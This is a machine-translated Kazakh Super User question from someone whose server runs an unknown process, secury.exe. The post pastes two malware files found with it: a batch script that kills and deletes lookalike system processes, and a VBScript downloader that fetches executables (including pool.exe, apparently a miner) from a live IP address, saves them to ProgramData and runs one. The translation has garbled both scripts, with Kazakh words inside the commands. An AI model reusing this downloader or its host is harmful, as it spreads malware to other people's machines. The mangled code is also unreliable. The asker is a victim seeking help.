windows - Бумен тұтынушыны жүктеу жолын мүлдем қалай жоюға болады - Super User

Менің тапсырма менеджерімде келесі жағдай бар:

Менің тапсырма менеджерімде келесі жағдай бар:

Мен қандай бағдарлама екенін білмеймін, бірақ оны орнатпағанымды және оны жою мүмкін болмағандықтан, Steam client bootstrapper емес екенімді білемін.

Егер қандай да бір бағдарламаны осы қадам арқылы білуге ​​тырыссам:

Мен осындай нәрсені көремін:

MS Config утилитасында secury.exe секілді ештеңе таппадым.

Файлдың орнын ашқан кезде үш файлды көремін:

m.bat, b.exe, 4.vbs.

Төменде m.bat мазмұны шығады:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe файлын C: \ Windows \ System32 \ soiuos.exe C: \ ProgramData \ explor0rer.exe файлын C: \ ProgramData \ ieplare.exe арқылы C: \ ProgramData \ nssm.exe арқылы C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ ProgramData \ MSASCui.exe del C: \ Pro C: \ ProgramData \ Process.exe файлын C: \ ProgramData \ winlnlt.exe арқылы C: \ ProgramData \ WindowsUpgrade.exe C: \ ProgramData \ msdc.exe файлына қосыңыз: C: \ ProgramData \ SystemSetting.exe delData \ SystemSettlngs.exe del C: \ ProgramData \ C: \ ProgramData \ apkls.exe C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe файлын C: \ ProgramData \ lqrtqe.exe файлынан табуға болады C: \ ProgramData \ winlog.exe del C: \ ProgramData C: \ ProgramData \ fcty.exe C: \ ProgramData \ pool.exe del C: \ ProgramData \ win1ogins.exe C: \ ProgramData \ shovsts.exe C: \ ProgramData \ C: \ ProgramData \ pool3.exe

Келесі 4.vbs өтеді:

Set xPost = CreateObject («Microsoft.XMLHTTP») xPost.Open «GET», «http://223.68.209.7:65510/2.exe», 0 xPost.Send () Set sGet = CreateObject («ADODB.Stream» sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile «c: \ ProgramData \ s2.exe», 2 Set xPost = CreateObject («Microsoft.XMLHTTP») xPost.Open «GET», «http://223.68.209.7:65510/pool.exe», 0 xPost.Send () Set sGet = CreateObject («ADODB.Stream») sGet.Mode = 3 sGet.Type = 1 sGet.Write (xPost.responseBody) sGet.SaveToFile «c: \ ProgramData \ pool2.exe», 2 CreateObject («WScript.Shell»). «C: \ ProgramData \ pool3.exe» іске қосыңыз CreateObject ( «WScript.Shell») «del C: \ ProgramData \ pool3.exe» іске қосыңыз

Secury.exe файлын менің серверімнің компьютерлік өкілеттіктерін асыра пайдаланудан қалай тоқтатуға болады?

PS Мен компьютерімнің Avast толық тексеруін орындадым, бірақ ол дұрыс емес.